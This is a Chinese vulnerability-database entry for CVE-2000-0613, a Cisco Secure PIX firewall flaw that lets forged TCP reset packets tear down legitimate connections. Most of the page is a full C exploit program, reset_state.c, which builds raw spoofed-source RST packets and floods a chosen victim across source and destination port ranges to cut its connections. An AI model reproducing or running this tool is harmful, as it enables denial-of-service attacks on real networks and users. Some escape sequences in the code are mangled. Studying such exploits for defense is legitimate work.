Cisco Secure PIX防火墙伪造TCP RST漏洞
漏洞ID | 1105912 | 漏洞类型 | 访问验证错误 |
发布时间 | 2000-07-10 | 更新时间 | 2005-07-27 |
CVE编号 | CVE-2000-0613 |
CNNVD-ID | CNNVD-200003-038 |
漏洞平台 | Hardware | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
CiscoSecurePIX防火墙存在漏洞,不能正确辨识伪造的TCP置位包(RST),远程攻击者可以利用这个漏洞迫使防火墙关闭合法连接。
|漏洞EXP
source: http://www.securityfocus.com/bid/1454/info
A connection through a Cisco Secure PIX Firewall can be reset by a third party if the source and destination IP addresses and ports of the connection can be determined or inferred. This can be accomplished by sending a forged TCP Reset (RST) packet to the firewall, containing the same source and destination addresses and ports (in the TCP packet header) as the connection to be disrupted. The attacker would have to possess detailed knowledge of the connection table in the firewall (which is used to track outgoing connections and disallow any connections from the external network that were not initiated by an internal machine) or be able to otherwise determine the required IP address and port information to exploit this.
/* reset_state.c (c) 2000 Citec Network Securities */
/* The code following below is copyright Citec Network Securities */
/* Code was developed for testing, and is written to compile under */
/* FreeBSD */
#define __BSD_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
struct slist {
struct in_addr spoof;
struct slist *link;
}; /* Spoof list */
int
main(int argc, char *argv[])
{
int i, int2;
int sock; /* Socket stuff */
int on = 1; /* Socket stuff */
struct sockaddr_in sockstruct; /* Socket stuff */
struct ip *iphead; /* IP Header pointer */
struct tcphdr *tcphead; /* TCP Header pointer */
char evilpacket[sizeof(struct ip) + sizeof(struct
tcphdr)];
/* Our reset packet */
int seq, ack; /* Sequence and Acknowledgement #'s
*/
FILE *spooffile; /* Spoof file */
char *buffer; /* Spoof file read buffer */
struct slist *scur, *sfirst; /* Spoof linked list pointers */
char src[20], dst[20]; /* Work around for inet_ntoa static
*/
/* Pointers when using printf() */
int sourcefrom, sourceto, destfrom, destto; /* CMD Line ports */
int target; /* Target address from inet_addr()
*/
if(argc < 6) {
fprintf(stderr, "Usage: %s spoof_file target sps spe dps
dpen"
"target = your victimn"
"sps = Source port startn"
"spe = Source port endn"
"dps = Destination port startn"
"dpe = Destination port endn", argv[0]);
exit(-1);
}
else {
sourcefrom = atoi(argv[3]);
sourceto = atoi(argv[4]);
destfrom = atoi(argv[5]);
destto = atoi(argv[6]);
};
if(sourcefrom > sourceto) {
printf("Error, start source port must be less than end
source portn");
exit(-1);
}
else if(destfrom > destto) {
printf("Error, start dest port must be less than end dest
portn");
exit(-1);
};
printf("Used spoof file %sn"
"Destination: [%s] ports: [%d -> %d]n"
"Target source ports: [%d -> %d]n",
argv[1], argv[2], destfrom, destto, sourcefrom, sourceto);
sleep(1);
bzero(evilpacket, sizeof(evilpacket));
/* Clean our reset packet */
sfirst = malloc(sizeof(struct slist));
scur = sfirst;
scur->link = NULL; /* Setup our spoof linked list */
if(!(buffer = malloc(25))) {
perror("malloc");
exit(-1);
}; /* Allocate for read buffer */
if ((spooffile = fopen((char *) argv[1], "r")) <= 0) {
perror("fopen");
exit(-1); /* Open our spoof file */
} else {
while (fgets(buffer, 25, spooffile)) { /* Read till EOF */
if (!(inet_aton(buffer, &(scur->spoof))))
printf("Invalid address found in victim
file.. ignoringn");
else {
scur->link = malloc(sizeof(struct slist));
scur = scur->link;
scur->link = NULL; /* Cycle l.list */
}
}; /* End of while loop */
}; /* End of if {} else {} */
free(buffer); /* Free up our read buffer */
fclose(spooffile); /* Close our spoof file */
scur = sfirst; /* Set spoof list current to first
*/
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
exit(-1);
} /* Allocate our raw socket */
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *) &on,
sizeof(on)) < 0) {
perror("setsockopt");
exit(-1);
} /* Set socket options for raw iphead
*/
sockstruct.sin_family = AF_INET;
iphead = (struct ip *) evilpacket;
tcphead = (struct tcphdr *) (evilpacket + sizeof(struct ip));
/* Align ip and tcp headers */
iphead->ip_hl = 5; /* Ip header length is 5 */
iphead->ip_v = 4; /* ipv4 */
iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
/* Length of our total packet */
iphead->ip_id = htons(getpid()); /* Packet ID == PID # */
iphead->ip_ttl = 255; /* Time to live == 255 */
iphead->ip_p = IPPROTO_TCP; /* TCP Packet */
iphead->ip_sum = 0; /* No checksum */
iphead->ip_tos = 0; /* 0 Type of Service */
iphead->ip_off = 0; /* Offset is 0 */
tcphead->th_win = htons(512); /* TCP Window is 512 */
tcphead->th_flags = TH_RST; /* Reset packet */
tcphead->th_off = 0x50; /* TCP Offset 0x50 */
iphead->ip_dst.s_addr = inet_addr(argv[2]);
srand(getpid()); /* Seed for rand() */
while (scur->link != NULL) {
seq = rand() % time(NULL); /* Randomize our #'s */
ack = rand() % time(NULL); /* Randomize ack #'s */
sockstruct.sin_port = htons(rand() % time(NULL));
iphead->ip_src = scur->spoof; /* Set the spoofed address
*/
sockstruct.sin_addr = scur->spoof;
for(i = sourcefrom; i <= sourceto; i++) {
for(int2 = destfrom; int2 <= destto; int2++) {
usleep(2); /* Sleep 5ms between packets
*/
seq += (rand() %10)+250;
ack += (rand() %10)+250;
tcphead->th_seq = htonl(seq);
/* Set sequence number */
tcphead->th_ack = htonl(ack);
/* Set ack number */
tcphead->th_dport = htons(int2);
/* Set destination port */
tcphead->th_sport = htons(i);
/* Set source port */
snprintf(src, 20, "%s",
inet_ntoa(iphead->ip_src));
snprintf(dst, 20, "%s",
inet_ntoa(iphead->ip_dst));
/* Copy info to src and dst for printing */
printf("TCP RESET: [%s:%d] -> [%s:%d]n",
src, ntohs(tcphead->th_sport), dst, ntohs(tcphead->th_dport));
sendto(sock, &evilpacket,
sizeof(evilpacket), 0x0,
(struct sockaddr *) & sockstruct,
sizeof(sockstruct));
/* Send our evil packet */
};
};
scur = scur->link; /* Cycle the spoof ips */
}
scur = sfirst;
return (1);
};
|参考资料
来源:BUGTRAQ
名称:20000320PIXDMZDenialofService-TCPResets
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:XF
名称:cisco-pix-firewall-tcp
链接:http://xforce.iss.net/static/4928.php
来源:BID
名称:1454
链接:http://www.securityfocus.com/bid/1454
来源:OSVDB
名称:1457
链接:http://www.osvdb.org/1457
来源:CISCO
名称:20000711CiscoSecurePIXFirewallTCPResetVulnerability
链接:http://www.cisco.com/warp/public/707/pixtcpreset-pub.shtml
相关推荐: SmartFTP Daemon 0.2访问控制漏洞
SmartFTP Daemon 0.2访问控制漏洞 漏洞ID 1206448 漏洞类型 未知 发布时间 2000-06-13 更新时间 2005-05-02 CVE编号 CVE-2000-0565 CNNVD-ID CNNVD-200006-055 漏洞平台 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666